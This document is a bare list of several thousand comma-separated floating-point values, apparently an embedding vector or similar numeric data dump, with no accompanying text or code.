0.00011018045188393444, 0.003307121805846691, -0.008998923934996128, -0.01128794439136982, 0.003894750727340579, -0.015742992982268333, 0.03255191817879677, 0.004868438467383385, -0.016398951411247253, 0.00988720078021288, -0.022493893280625343, 0.022671548649668694, -0.00735902925953269, 0.013235319405794144, -0.01352913398295641, -0.011356273666024208, -0.03219660744071007, 0.03386383131146431, 0.03375450521707535, 0.01355646550655365, 0.028588837012648582, 0.04662768170237541, 0.014936710707843304, -0.0037683420814573765, -0.03635100647807121, -0.01660393737256527, 0.015087034553289413, 0.019132109358906746, -0.008178976364433765, 0.009333736263215542, 0.0017150569474324584, -0.027427244931459427, 0.011417768895626068, 0.034191813319921494, 0.03252458572387695, -0.0040245759300887585, -0.019391758367419243, -0.01304399874061346, 0.002278770785778761, -0.0329618901014328, -0.011410936713218689, 0.008049151860177517, -0.0058284602127969265, -0.009156080894172192, -0.041352685540914536, 0.014308084733784199, -0.02089499682188034, 0.0326065793633461, -0.02698993869125843, -0.03815489262342453, 0.00619402015581727, -0.027618566527962685, -0.010495328344404697, -0.02872549556195736, 0.036514997482299805, -0.008800770156085491, 0.010877970606088638, -0.03607769310474396, 0.017628872767090797, -0.03766292333602905, -0.002488882513716817, 0.007413692306727171, 0.033180542290210724, 0.014321750029921532, -0.00025666065630503, 0.032032616436481476, 0.026374978944659233, -0.008834934793412685, 0.016193963587284088, -0.04884153977036476, 0.01286634337157011, 0.009449895471334457, 0.02418845146894455, -0.0019337096018716693, 0.03678831085562706, 0.006808980833739042, -0.005555144511163235, 0.04843156784772873, -0.012627191841602325, -0.024803413078188896, -0.0038571697659790516, 0.004444798920303583, 0.018899790942668915, 0.03728028014302254, 0.028588837012648582, 0.003925498574972153, -0.0494428351521492, 0.005790879484266043, -0.029053473845124245, -0.0031414239201694727, -0.03965812921524048, -0.01301666721701622, 0.0281788632273674, 0.008561618626117706, 0.026730289682745934, 0.02704460360109806, -0.008288303390145302, -0.05378855764865875, 0.011062459088861942, -0.04681900516152382, -0.04938817396759987, -0.006381924729794264, 0.002152362372726202, -0.010256176814436913, 0.03785424306988716, -0.005497064907103777, 0.0012316295178607106, 0.006925140041857958, -0.06133207678794861, -0.000670477922540158, -0.022767210379242897, -0.00547998258844018, -0.06138673797249794, -0.005059759598225355, 0.05190267786383629, 0.030884690582752228, -0.02418845146894455, -0.01798418164253235, -0.0011393853928893805, -0.01862647384405136, -0.017355555668473244, 0.04539776220917702, 0.0092585738748312, -0.038373544812202454, 0.017341889441013336, 0.04118869826197624, -0.004253477789461613, 0.0007349633960984647, -0.007536684162914753, -0.0023334340658038855, 0.036514997482299805, -0.02908080630004406, 0.00700371852144599, 0.014321750029921532, 0.008889597840607166, 0.020075049251317978, 0.0032883312087506056, -0.031731970608234406, 0.015961645171046257, 0.02495373599231243, 0.006132524460554123, 0.03859219700098038, 0.004967515356838703, 0.011561260558664799, -0.00668598897755146, -0.014280753210186958, -0.05668570473790169, 0.016494611278176308, 0.018353158608078957, -0.04219996556639671, 0.02269888110458851, -0.05969218164682388, 0.03326253965497017, 0.0075503503903746605, 0.015469676814973354, -0.018585477024316788, 0.021414296701550484, -0.0076938411220908165, -0.02096332609653473, 0.0019507918041199446, 0.003935748245567083, 0.02519972063601017, -0.0038366711232811213, -0.006836312357336283, 0.03498442843556404, 0.031677305698394775, -0.029600106179714203, -0.004677117336541414, 0.00317217200063169, -0.010816474445164204, -0.06925823539495468, -0.01334464643150568, 0.027850884944200516, -0.013153324835002422, -0.02431144379079342, -0.004499461967498064, 0.027181260287761688, 0.05075475201010704, -0.041352685540914536, 0.03708896040916443, 0.010563657619059086, -0.016590271145105362, 0.0012973961420357227, 0.03181396424770355, -0.043265897780656815, 0.02191993035376072, 0.025418372824788094, -0.04681900516152382, 0.05337858572602272, -0.030802695080637932, 0.0209086611866951, 0.01423975545912981, 0.01827116496860981, 0.01454040315002203, -0.0026631213258951902, -0.03815489262342453, -0.0045985388569533825, 0.011547594331204891, 0.0029193549416959286, 0.0022189829032868147, 0.05217599496245384, 0.004499461967498064, -0.02000671997666359, -0.03487510234117508, 0.004202231299132109, 0.0490875244140625, -0.01868113875389099, 0.021660281345248222, 0.04162600263953209, 0.004673700779676437, 0.02191993035376072, 0.026853282004594803, -0.0011000962695106864, 0.004496045410633087, -0.03003741055727005, 0.019132109358906746, 0.005702051799744368, -0.02656630054116249, 0.05182068422436714, -0.021687611937522888, 0.00360435270704329, -0.0018448819173499942, -0.01797051727771759, 0.003348119091242552, 0.022316237911581993, -0.006224768236279488, 0.006949055474251509, 0.0012188178952783346, -0.028342852368950844, 0.012374375015497208, -0.021906264126300812, -0.009716378524899483, -0.0041475677862763405, -0.019719738513231277, -0.009497725404798985, 0.005910455249249935, -0.012107891961932182, -0.03416448086500168, 0.008916929364204407, -0.0010787434875965118, -0.025596028193831444, 0.013467637822031975, -0.002763906493782997, -0.03779958188533783, 0.020881330594420433, 0.007270201575011015, -0.0021096565760672092, 0.027850884944200516, 0.014636063016951084, -0.00973687693476677, -0.0035428565461188555, -0.03856486454606056, 0.03421914204955101, -0.03659699112176895, 0.03279790282249451, -0.024940071627497673, 0.02381947636604309, -0.002514505758881569, -0.02340950258076191, -0.021933596581220627, 0.03451979160308838, -0.009730043821036816, -0.0062486836686730385, 0.015674663707613945, 0.004537043161690235, -0.016152966767549515, 0.05261329934000969, 0.0008498414536006749, -0.011957568116486073, -0.005483399145305157, -0.007099378854036331, -0.02060801535844803, 0.002461550757288933, -0.02878015860915184, -0.0007507644477300346, 0.03044738434255123, -0.029545443132519722, 0.04742030054330826, 0.00444821547716856, 0.01977440156042576, 0.0024085957556962967, 0.032032616436481476, -0.02633398212492466, -0.030119406059384346, 0.030474716797471046, -0.028042204678058624, 0.023013193160295486, 0.01857181079685688, -0.029873421415686607, -0.024735083803534508, -0.04241861775517464, 0.006983219645917416, -0.017820192500948906, 0.024803413078188896, 0.006146190222352743, 0.05991083383560181, 0.02334117330610752, 0.008623114787042141, 0.005483399145305157, -0.010481663048267365, 0.06630642712116241, -0.0031772966030985117, 0.005076841916888952, -0.02179693803191185, 0.014171426184475422, -0.03569504991173744, -0.04665501415729523, -0.010584156028926373, 0.005124671850353479, 0.013071330264210701, 0.05261329934000969, -0.03542173281311989, 0.0016629560850560665, 0.015032371506094933, 0.034902434796094894, 0.0073863607831299305, -0.003717095358297229, -0.007680175360292196, 0.025664357468485832, -0.008411294780671597, 0.015100700780749321, 0.032087281346321106, 0.04250061511993408, -0.003368617733940482, 0.0028424847405403852, -0.007782668806612492, -0.010495328344404697, -0.023095188662409782, 0.009320070035755634, 0.005227165296673775, 0.00477961078286171, 0.0018090092344209552, 0.03692496940493584, -0.01426708698272705, 0.019555749371647835, 0.005169085692614317, -0.010939466767013073, 0.022165914997458458, 0.02245289646089077, 0.019159439951181412, -0.03099401667714119, -0.009402064606547356, 0.013467637822031975, -0.0223299041390419, -0.00889643095433712, -0.016972914338111877, 0.000915608077775687, 0.01021517999470234, -0.020102379843592644, -0.0425279438495636, -0.004950433038175106, -0.002128447173163295, -0.018530813977122307, 0.009907699190080166, 0.007919326424598694, -0.0034181561786681414, -0.015210026875138283, 0.015838652849197388, -0.0023300175089389086, 0.004468713887035847, 0.021714944392442703, -0.004912852309644222, -0.015524339862167835, 0.04102470725774765, -0.0013913484290242195, -0.0031345910392701626, -0.03462911769747734, -0.01128794439136982, 0.025514034554362297, 0.015524339862167835, 0.017478547990322113, 0.007714339531958103, -0.003076511435210705, 0.0003243490355089307, 0.010871137492358685, 0.04504245147109032, -0.00874610710889101, -0.012914173305034637, 0.015770323574543, 0.001059098867699504, -0.012162555009126663, 0.006402423605322838, -0.0016407491639256477, 0.01623496040701866, 0.0043115573935210705, -0.006860227789729834, 0.020935993641614914, 0.006747484672814608, 0.03104867972433567, 0.03200528398156166, -0.014130429364740849, 0.008636781014502048, -0.0012939797015860677, 0.010830140672624111, -0.006610827054828405, -0.01947375386953354, -0.007946657948195934, 0.03350852057337761, -0.010222012177109718, 0.027727892622351646, -0.01605730503797531, -0.011199116706848145, 0.03861952945590019, -0.01199856586754322, 0.005490231793373823, 0.0202937014400959, -0.00392891513183713, -0.02883482165634632, 0.0002940280537586659, -0.012408539652824402, -0.014800053089857101, -0.01582498662173748, 0.0058284602127969265, 0.016740595921874046, -0.027085600420832634, -0.01039283536374569, -0.03268857300281525, -0.025404708459973335, 0.03181396424770355, -0.004646369256079197, 0.044167838990688324, -0.0021216142922639847, 0.00036598698352463543, 0.009067253209650517, 0.008404462598264217, 0.014499405398964882, 0.02293119952082634, -0.01403476856648922, -0.04083338752388954, 0.02084033377468586, 0.011035127565264702, 0.01702757738530636, -0.030912021175026894, 0.042363956570625305, 0.04028675705194473, 0.002675078809261322, -0.02913546934723854, -0.0017253062687814236, -0.014157760888338089, 0.015456010587513447, 0.030802695080637932, 0.0016236669616773725, 0.01587964966893196, 0.014608731493353844, -0.030857358127832413, -0.0022019008174538612, 0.02902614325284958, 0.02794654481112957, -0.051738690584897995, -0.039685461670160294, -0.014294418506324291, -0.009839369915425777, -0.005678136833012104, -0.0363236740231514, 0.005729383323341608, -0.021810604259371758, -0.030556710436940193, -0.0035291907843202353, 0.004171483218669891, 0.010433832183480263, 0.0018722135573625565, -0.009976028464734554, -0.005606391467154026, -0.013570131734013557, 0.019719738513231277, -0.026142660528421402, -0.019911060109734535, -0.017273562029004097, 0.002811736660078168, 0.04258260875940323, 0.046245042234659195, 0.009620717726647854, -0.024571094661951065, 0.009702712297439575, 0.013638461008667946, -0.018886124715209007, 0.010761811397969723, -0.025008399039506912, -0.002306102542206645, 0.02053968608379364, -0.00616668863222003, -0.0022275240626186132, -0.0006914036930538714, -0.007113044615834951, -0.007447856944054365, 0.010194680653512478, 0.0032695408444851637, 0.015551671385765076, 0.007734838407486677, -0.03301655501127243, 0.01706857420504093, -0.03990411385893822, 0.012757017277181149, 0.0033498273696750402, 0.015237358398735523, -0.0005641409661620855, 0.001984956208616495, -0.02526804991066456, -0.034191813319921494, -0.04250061511993408, -0.0011658628936856985, -0.003809339599683881, 0.005114422645419836, 0.012552030384540558, 0.0025845428463071585, 0.0014391787117347121, 0.016685932874679565, -0.04118869826197624, 0.01062515377998352, 0.01838049106299877, 0.015128032304346561, -0.022015592083334923, 0.008998923934996128, -0.0009600219200365245, -0.025883009657263756, -0.004410634282976389, 0.00904675479978323, -0.03678831085562706, -0.02883482165634632, -0.006173521745949984, -0.035503726452589035, -0.00041979606612585485, -0.0007511915173381567, -0.010584156028926373, -0.006081277504563332, -0.02012971229851246, 0.007154042366892099, 0.002266813302412629, 0.010618320666253567, 0.04121603071689606, -0.0373896062374115, -0.006706487387418747, -0.02041669376194477, 0.016576606780290604, -0.04490579292178154, 0.017587874084711075, -0.03635100647807121, 0.021933596581220627, -0.018066177144646645, -0.014294418506324291, 0.014731723815202713, 0.020567016676068306, 0.04408584535121918, -0.0001038813716149889, 0.0333172008395195, 0.003679514629766345, -0.025937672704458237, -0.014950376935303211, 0.014280753210186958, -0.03184129670262337, 0.02555503137409687, -0.004407218191772699, 0.014977708458900452, 0.024407105520367622, 0.012442703358829021, -0.025814682245254517, 0.0016655183862894773, -0.05056343227624893, -0.019241435453295708, -0.017779195681214333, 0.016822589561343193, 0.008875931613147259, -0.024994734674692154, -0.03443779796361923, 0.02381947636604309, 0.012039562687277794, -0.010953132063150406, -0.020198041573166847, -0.03410981595516205, 0.0014366164105013013, -0.034492459148168564, -0.010789142921566963, -0.018476150929927826, 0.007741671055555344, 0.01600264199078083, 0.00928590539842844, -0.010208346880972385, 0.010543158277869225, 0.011281111277639866, -0.0027724476531147957, -0.014841049909591675, -0.04438649117946625, -0.001527152257040143, 0.0007298387354239821, 0.04616304486989975, 0.022193245589733124, -0.002687036292627454, 0.012859510257840157, 0.019487420096993446, -0.011752581223845482, -0.031622644513845444, -0.009812038391828537, 0.02585567906498909, -0.01976073533296585, -0.02847951091825962, -0.006334094796329737, -0.002181402174755931, 0.008732440881431103, 0.03763559088110924, -0.005336491856724024, -0.059746842831373215, 0.027919214218854904, -0.023778477683663368, 0.0018363408744335175, 0.03320787474513054, 0.017095906659960747, -0.008705109357833862, 0.005473149940371513, 0.006142773665487766, -0.006159855984151363, -0.0017816777108237147, 0.003676098072901368, 0.016166632995009422, 0.013125993311405182, 0.0006700508529320359, 0.003512108698487282, 0.029463447630405426, -0.006419505923986435, 0.004653202369809151, -0.02842484787106514, 0.0013392476830631495, 0.01128794439136982, 0.009832537733018398, -0.013638461008667946, -0.0008327591931447387, 0.003100426634773612, -0.0005995866376906633, 0.007987655699253082, 0.020512353628873825, -0.015428679063916206, 0.022370900958776474, 0.04154400900006294, -0.03749893233180046, 0.013563298620283604, 0.040040772408246994, 0.005596141796559095, -0.02962743677198887, 0.04198131337761879, 0.030228732153773308, -0.011786745861172676, 0.012039562687277794, 0.007441023830324411, -0.02060801535844803, 0.007488854229450226, -0.029354121536016464, 0.011909738183021545, 0.013242152519524097, -0.019419090822339058, -0.01263402495533228, 0.01702757738530636, -0.011410936713218689, 0.010768644511699677, -0.0007985947304405272, 0.0032285433262586594, 0.008076483383774757, -0.021222975105047226, -0.025473035871982574, -0.03763559088110924, -0.011779912747442722, -0.04419517144560814, -0.02073100581765175, 0.02018437534570694, -0.014349081553518772, 0.022767210379242897, -0.012675021775066853, -0.0066996547393500805, 0.015852319076657295, 0.029928084462881088, 0.010023858398199081, -0.01078230980783701, -0.014854716137051582, 0.018544480204582214, 0.01256569568067789, 0.0005380905931815505, 0.0016287915641441941, -0.013214820995926857, 0.0285341739654541, -0.012845844961702824, 0.002070367569103837, -0.013686290942132473, -0.024735083803534508, -0.002242898102849722, 0.012552030384540558, 0.008985258638858795, -0.01587964966893196, -0.0075298515148460865, 0.023327507078647614, -0.0043115573935210705, 0.01454040315002203, 0.0008814436150714755, -0.014909379184246063, -0.022890202701091766, -0.02094965986907482, 0.007113044615834951, 0.06958621740341187, -0.021332301199436188, 0.009928197599947453, 0.03279790282249451, 0.0024581344332545996, -0.004253477789461613, 0.003741010557860136, 0.016467278823256493, -0.006122274789959192, -0.009306404739618301, 0.0007631490589119494, 0.01436274778097868, 0.009422563947737217, -0.010153683833777905, -0.02191993035376072, -0.030556710436940193, 0.006262349430471659, 0.013440306298434734, -0.008998923934996128, 0.0011530512711033225, 0.014882047660648823, 0.012524698860943317, -0.010358670726418495, 0.02298586256802082, 0.012244549579918385, -0.00787832960486412, -0.019993053749203682, 0.0011376772308722138, -0.013665792532265186, -0.002195067936554551, -0.004188565071672201, 0.009989693760871887, -0.01846248470246792, 0.004215897060930729, -0.0030525962356477976, -0.0005423611146397889, -0.013734120875597, 0.008582117035984993, 0.018708469346165657, -0.015920648351311684, 0.001906377961859107, -0.0050187623128294945, 0.012162555009126663, -0.000631188799161464, 0.02119564451277256, 0.004294475074857473, 0.002118197735399008, -0.021701278164982796, 0.029518110677599907, -0.012996168807148933, 0.0056849694810807705, -0.026771286502480507, 0.021591952070593834, -0.004325223155319691, 0.030201401561498642, 0.037116292864084244, 0.000076443022408057, -0.020553352311253548, 0.04408584535121918, -0.023983465507626534, -0.0056132241152226925, 0.019624076783657074, 0.021878933534026146, -0.03285256400704384, -0.023327507078647614, 0.006221351679414511, -0.019993053749203682, -0.0006260640802793205, -0.015059703029692173, -0.012271881103515625, 0.012148888781666756, 0.012319711968302727, -0.006832896266132593, -0.0062999301590025425, 0.015674663707613945, 0.025281716138124466, -0.03476577624678612, 0.0029552276246249676, 0.007953491061925888, -0.002893731463700533, -0.002757073612883687, -0.004506295081228018, -0.01281168032437563, -0.03039272129535675, 0.018230166286230087, -0.008520621806383133, -0.028588837012648582, -0.006925140041857958, 0.030556710436940193, 0.024229450151324272, 0.018899790942668915, -0.023272844031453133, 0.0034232810139656067, 0.010365502908825874, 0.01182091049849987, 0.04162600263953209, -0.012907341122627258, -0.019965723156929016, -0.003276373725384474, -0.028698163107037544, 0.01589331589639187, 0.02502206526696682, -0.007154042366892099, -0.01352230180054903, 0.035203080624341965, -0.00871877558529377, 0.0006324699497781694, -0.0011786745162680745, 0.018886124715209007, -0.003894750727340579, 0.005011929199099541, 0.03003741055727005, 0.015264689922332764, 0.017765529453754425, -0.01917310617864132, 0.008411294780671597, -0.005152003839612007, -0.016631269827485085, -0.023792143911123276, -0.002357349032536149, -0.03542173281311989, -0.021687611937522888, 0.031021349132061005, 0.011697918176651001, -0.014280753210186958, -0.011308442801237106, -0.020853998139500618, -0.005818211007863283, 0.004649785812944174, 0.0017159109702333808, 0.00394258089363575, -0.0056337229907512665, -0.02089499682188034, -0.004830857738852501, 0.027181260287761688, 0.036870308220386505, -0.006808980833739042, -0.006942222360521555, 0.00342669733799994, 0.01977440156042576, -0.01947375386953354, -0.0053057437762618065, -0.006846562027931213, 0.0049470169469714165, -0.025869345292448997, -0.012224051170051098, -0.008875931613147259, 0.007728005293756723, -0.028643500059843063, -0.007837331853806973, 0.007639177609235048, -0.0065151662565767765, 0.005688386037945747, 0.0161256343126297, 0.007980822585523129, 0.0029449781868606806, 0.029108136892318726, 0.01798418164253235, -0.014403744600713253, 0.011041959747672081, -0.004724947735667229, -0.005350157618522644, -0.01179357897490263, 0.033344533294439316, -0.017041243612766266, 0.011171785183250904, 0.040450744330883026, -0.0048547727055847645, -0.00011701334733515978, 0.008431794121861458, -0.014403744600713253, -0.004205647390335798, -0.0047625284641981125, -0.015469676814973354, -0.011205949820578098, -0.01665860041975975, 0.005797712132334709, -0.02078567072749138, -0.020567016676068306, 0.012681854888796806, 0.01421242393553257, -0.001988372765481472, -0.015538006089627743, 0.03378183767199516, 0.010973631404340267, 0.016931915655732155, 0.004109987057745457, 0.009012590162456036, -0.0040245759300887585, 0.013433474116027355, -0.003189254319295287, 0.011486098170280457, 0.028206195682287216, -0.012463202700018883, 0.021154645830392838, -0.012299212627112865, -0.009326903149485588, -0.011041959747672081, 0.023600822314620018, 0.016193963587284088, -0.00204645236954093, 0.015988977625966072, 0.01833949238061905, -0.0019217520020902157, 0.003744427114725113, -0.0014417411293834448, 0.0060129486955702305, 0.0027775722555816174, -0.012654523365199566, 0.005029011517763138, -0.00514858728274703, -0.011937069706618786, 0.012408539652824402, -0.007037883158773184, 0.011281111277639866, -0.015579002909362316, 0.022370900958776474, 0.001438324572518468, -0.01935076154768467, -0.04471447318792343, 0.011882406659424305, -0.029709432274103165, -0.008561618626117706, -0.009203910827636719, 0.016289623454213142, -0.028397515416145325, -0.004564374685287476, 0.0014835925539955497, -0.01113762054592371, -0.0034813606180250645, 0.012873176485300064, -0.006429755128920078, -0.002514505758881569, -0.006569829769432545, -0.01642628200352192, -0.008814436383545399, 0.019665075466036797, 0.03170463815331459, 0.0057772137224674225, 0.016918251290917397, -0.015497008338570595, -0.04351188242435455, 0.024625757709145546, -0.010789142921566963, 0.008650446310639381, -0.019091112539172173, -0.01892712153494358, -0.008534287102520466, 0.009169746190309525, -0.0014656562125310302, -0.005080258008092642, -0.010666150599718094, 0.007072047330439091, 0.00019324284221511334, -0.003741010557860136, 0.026361312717199326, 0.00940889772027731, 0.025473035871982574, -0.010317672975361347, -0.02321818098425865, -0.044523149728775024, 0.022644218057394028, -0.012743351049721241, -0.002249730983749032, -0.008342966437339783, 0.016166632995009422, -0.028561506420373917, 0.006805564276874065, -0.008165311068296432, -0.010051189921796322, 0.012599860318005085, 0.008144811727106571, 0.02513139136135578, -0.01563366688787937, 0.038482870906591415, 0.02084033377468586, 0.007652843836694956, 0.005237414967268705, -0.006621076259762049, 0.001899545080959797, 0.029545443132519722, -0.023682817816734314, -0.013959607109427452, 0.011021461337804794, -0.047556955367326736, -0.013488137163221836, 0.014349081553518772, 0.006655240897089243, 0.027837218716740608, -0.003319079289212823, -0.04329323023557663, -0.016029974445700645, -0.02275354415178299, -0.024024462327361107, -0.03337186574935913, -0.0018124256748706102, 0.030720701441168785, 0.009921365417540073, -0.013242152519524097, 0.0055209798738360405, 0.005066592246294022, -0.024270446971058846, 0.009723210707306862, -0.021236641332507133, 0.023669151589274406, 0.020526019856333733, -0.017533211037516594, -0.006067611742764711, -0.006385341286659241, -0.011889238841831684, 0.008411294780671597, 0.011984899640083313, 0.00409290473908186, -0.0006619368214160204, 0.012415371835231781, -0.01587964966893196, 0.015032371506094933, -0.036460332572460175, 0.0016134176403284073, -0.018899790942668915, -0.025883009657263756, 0.0082404725253582, 0.015565337613224983, 0.005725966766476631, 0.01672692969441414, 0.01736922189593315, 0.019788067787885666, -0.00841812789440155, -0.005428736098110676, 0.008527453988790512, -0.008828101679682732, -0.023204514756798744, 0.011240114457905293, 0.0037649257574230433, 0.004707865417003632, 0.005527812987565994, 0.019719738513231277, -0.0023231846280395985, -0.0066279093734920025, 0.030584042891860008, 0.005637139081954956, 0.004314973950386047, 0.0020225371699780226, 0.002420553471893072, 0.014936710707843304, 0.006696238182485104, -0.012025897391140461, -0.018353158608078957, -0.00821314100176096, -0.00719503965228796, 0.02138696424663067, -0.01164325512945652, -0.0030662622302770615, -0.001203443855047226, 0.0012803139397874475, 0.010078521445393562, -0.01587964966893196, 0.015155363827943802, -0.010058023035526276, 0.017246229574084282, -0.02310885488986969, 0.013447139412164688, -0.01230604574084282, -0.014280753210186958, 0.021769607439637184, -0.030119406059384346, 0.016808925196528435, -0.02544570527970791, 0.0012384623987600207, 0.035148415714502335, -0.0018073009559884667, 0.005035844631493092, -0.015524339862167835, -0.01176624745130539, -0.0240107960999012, -0.023573491722345352, -0.023368503898382187, -0.020047716796398163, -0.0011496347142383456, -0.0004701886500697583, -0.0007247140165418386, 0.0010505578247830272, 0.014636063016951084, 0.018257498741149902, 0.015018705278635025, -0.03760825842618942, 0.012319711968302727, -0.007714339531958103, -0.027659563347697258, 0.02191993035376072, 0.010017025284469128, 0.005264746490865946, 0.023737480863928795, -0.001298250281251967, -0.014171426184475422, -0.028042204678058624, -0.012791181914508343, -0.011301609687507153, 0.008356631733477116, -0.012702354229986668, 0.03957613557577133, 0.03339919447898865, -0.027208592742681503, -0.003717095358297229, -0.0053262426517903805, 0.03143132105469704, -0.009429396130144596, -0.029463447630405426, -0.02142796292901039, 0.001030059065669775, 0.008336133323609829, -0.009832537733018398, -0.003301996970549226, 0.008684610947966576, -0.014677060768008232, -0.00206011813133955, -0.007072047330439091, 0.003881084965541959, -0.0066074104979634285, -0.008711942471563816, -0.003918665926903486, -0.013187489472329617, -0.0075503503903746605, 0.01868113875389099, -0.012087393552064896, -0.0002455571957398206, 0.011868740431964397, 0.00019922162755392492, -0.003734177676960826, -0.012777515687048435, -0.044577814638614655, 0.006870476994663477, -0.010140017606317997, 0.004704448860138655, 0.0008489873143844306, 0.034957095980644226, 0.019309764727950096, -0.01881779544055462, 0.003717095358297229, -0.013228487223386765, -0.0032883312087506056, 0.013228487223386765, -0.0029671851079910994, -0.01864014007151127, -0.03640567138791084, 0.04097004607319832, 0.005753298290073872, 0.003826421918347478, 0.012627191841602325, 0.0015057994751259685, 0.0022941448260098696, 0.015988977625966072, -0.010775476694107056, -0.018954453989863396, 0.006211102474480867, 0.026169991120696068, 0.00461562117561698, -0.025213386863470078, -0.026497971266508102, 0.002403471153229475, 0.026306649670004845, 0.026552634313702583, -0.037225618958473206, -0.01594797894358635, -0.004222729708999395, -0.007277034223079681, -0.02867083251476288, -0.00018715728947427124, -0.016754260286688805, 0.009210743941366673, 0.019569413736462593, -0.005418486427515745, -0.029217462986707687, -0.021810604259371758, -0.007625511847436428, 0.003959663212299347, -0.020334698259830475, 0.02461209148168564, 0.0007691278588026762, -0.05023545026779175, 0.00844545941799879, 0.012517865747213364, 0.021509956568479538, -0.01935076154768467, -0.027550237253308296, 0.01128794439136982, 0.03730761259794235, -0.008165311068296432, -0.01080280914902687, -0.015415013767778873, 0.0026169992052018642, 0.0028527341783046722, 0.0024222617503255606, 0.0029415618628263474, 0.00803548563271761, 0.010761811397969723, -0.011062459088861942, 0.01331731490790844, 0.003894750727340579, -0.01635795272886753, 0.008957927115261555, 0.022193245589733124, -0.023423166945576668, 0.01862647384405136, -0.0109872967004776, 0.015278355218470097, 0.027905547991394997, -0.01256569568067789, -0.005015345755964518, -0.003645349992439151, 0.012340210378170013, 0.040450744330883026, 0.027577567845582962, 0.020676342770457268, 0.004198814742267132, -0.004007493611425161, 0.004718114621937275, 0.003414739854633808, -0.01947375386953354, -0.0011376772308722138, -0.02006138302385807, 0.02927212603390217, -0.015333019196987152, 0.01857181079685688, 0.009026255458593369, 0.01736922189593315, 0.011595424264669418, 0.004376470111310482, -0.00908091850578785, -0.03471111133694649, 0.01406210009008646, -0.012729685753583908, 0.004571207333356142, 0.0012632316211238503, 0.01423975545912981, 0.010304007679224014, 0.019542083144187927, 0.02429777756333351, -0.007932992652058601, -0.012429038062691689, -0.006942222360521555, -0.01593431457877159, -0.020075049251317978, -0.011807244271039963, 0.024379773065447807, 0.008260970935225487, -0.012668189592659473, 0.0013614544877782464, -0.03104867972433567, 0.01869480311870575, -0.010638819076120853, -0.01176624745130539, -0.024051794782280922, -0.02644330821931362, -0.0008558202534914017, -0.018886124715209007, -0.004786443896591663, -0.03282523155212402, -0.007782668806612492, 0.012401706539094448, -0.004390135873109102, -0.02932678908109665, -0.008465957827866077, -0.02741357870399952, -0.013160157948732376, -0.00818580947816372, 0.008657279424369335, -0.015483342111110687, -0.0164809450507164, -0.04629970341920853, 0.019132109358906746, 0.01756054349243641, -0.012408539652824402, 0.015551671385765076, 0.01665860041975975, 0.02096332609653473, 0.021687611937522888, -0.010939466767013073, 0.002893731463700533, -0.009033088572323322, 0.024229450151324272, 0.02615632675588131, 0.00531257688999176, 0.0027656147722154856, 0.010187848471105099, 0.005216916091740131, -0.0016638102242723107, 0.0018192585557699203, 0.0014562610303983092, -0.002657996490597725, -0.001003581564873457, 0.0015783989802002907, 0.0013717039255425334, -0.007147209253162146, -0.03583170846104622, -0.01850348338484764, 0.0014545527519658208, -0.00019377666467335075, -0.004919684957712889, 0.019856395199894905, -0.00034313948708586395, -0.014554068446159363, -0.014759055338799953, -0.02041669376194477, -0.003809339599683881, -0.005169085692614317, 0.02435244247317314, 0.03268857300281525, -0.028233526274561882, 0.0031602145172655582, -0.0062076859176158905, -0.012394873425364494, 0.005831876769661903, -0.013570131734013557, 0.012394873425364494, -0.012880008667707443, -0.016521941870450974, 0.033645179122686386, -0.017287226393818855, 0.012975669465959072, 0.0359683632850647, 0.011397270485758781, -0.0011094914516434073, -0.013713622465729713, -0.022343570366501808, -0.012142056599259377, -0.012463202700018883, -0.004933351185172796, -0.0008084170403890312, -0.03211461007595062, 0.0024478849954903126, -0.002750240731984377, -0.003922082483768463, 0.007536684162914753, 0.021646615117788315, -0.017423884943127632, 0.007973989471793175, -0.011472432874143124, -0.034847769886255264, 0.020211705937981606, 0.016740595921874046, -0.03421914204955101, -0.015483342111110687, 0.015169029124081135, 0.02412012405693531, -0.010925800539553165, 0.001749221351929009, 0.0069148908369243145, 0.0015314228367060423, -0.019842730835080147, 0.012517865747213364, -0.010857472196221352, 0.005975367501378059, -0.002697285730391741, 0.024584760889410973, 0.029053473845124245, 0.009531890042126179, -0.005138338077813387, 0.006217935588210821, -0.006518582813441753, -0.010488495230674744, -0.02358715794980526, -0.0019661658443510532, 0.010201513767242432, -0.004731780383735895, -0.006757734343409538, 0.0028305272571742535, 0.0021404046565294266, 0.016193963587284088, -0.01042016688734293, -0.010884803719818592, 0.010228845290839672, 0.004359387792646885, 0.0012410246999934316, 0.01814817264676094, 0.003394241211935878, -0.005565393716096878, -0.021113649010658264, 0.02160561829805374, 0.010857472196221352, 0.004714698065072298, 0.005445817951112986, -0.003580437507480383, -0.0381002277135849, 0.0009813746437430382, 0.0014853008324280381, -0.012142056599259377, 0.02006138302385807, 0.018353158608078957, -0.014157760888338089, -0.020826667547225952, 0.009121916256844997, -0.013631627894937992, 0.015360350720584393, -0.01689091883599758, -0.0011581758735701442, -0.009484060108661652, 0.013119160197675228, -0.0011402395321056247, -0.015059703029692173, 0.013624794781208038, 0.01587964966893196, 0.02381947636604309, -0.004468713887035847, 0.011704751290380955, -0.0030338058713823557, -0.01385711319744587, -0.017956851050257683, -0.007536684162914753, -0.035804376006126404, -0.017505880445241928, 0.0034454879350960255, -0.004280809313058853, -0.011930236592888832, -0.00040100558544509113, 0.003348119091242552, 0.019241435453295708, 0.013652126304805279, -0.010140017606317997, -0.025063062086701393, 0.014827384613454342, -0.019733404740691185, 0.016289623454213142, 0.010467996820807457, -0.0019268767209723592, -0.012640858069062233, -0.0040758224204182625, -0.004738613497465849, -0.008944260887801647, 0.00925174169242382, -0.004103153944015503, -0.00631701247766614, -0.004923101514577866, -0.001595481182448566, -0.0035360236652195454, 0.014868381433188915, 0.006887559313327074, 0.02519972063601017, -0.010426999069750309, 0.006696238182485104, -0.008561618626117706, 0.0240107960999012, 0.02108631655573845, 0.022589555010199547, -0.00024769248557277024, 0.014403744600713253, 0.0015365475555881858, 0.01167058665305376, 0.005370656494051218, -0.010925800539553165, 0.006364842876791954, -0.015688329935073853, 0.02071734145283699, -0.000017269077943637967, -0.006849978119134903, 0.001935417763888836, 0.014116763137280941, -0.009456728585064411, 0.010153683833777905, -0.01268868800252676, 0.0026016251649707556, 0.014253421686589718, 0.025213386863470078, 0.005295494571328163, -0.0014075766084715724, -0.013617961667478085, 0.010365502908825874, -0.018790464848279953, -0.026292983442544937, -0.01564733125269413, 0.019337095320224762, 0.012121557258069515, -0.007816833443939686, 0.005818211007863283, -0.01006485614925623, 0.0015835236990824342, -0.006115442141890526, -0.0192277692258358, -0.006252099759876728, 0.023983465507626534, 0.002502548275515437, -0.009094584733247757, -0.02603333443403244, 0.007352196145802736, -0.006638158578425646, 0.002524755196645856, 0.016877252608537674, 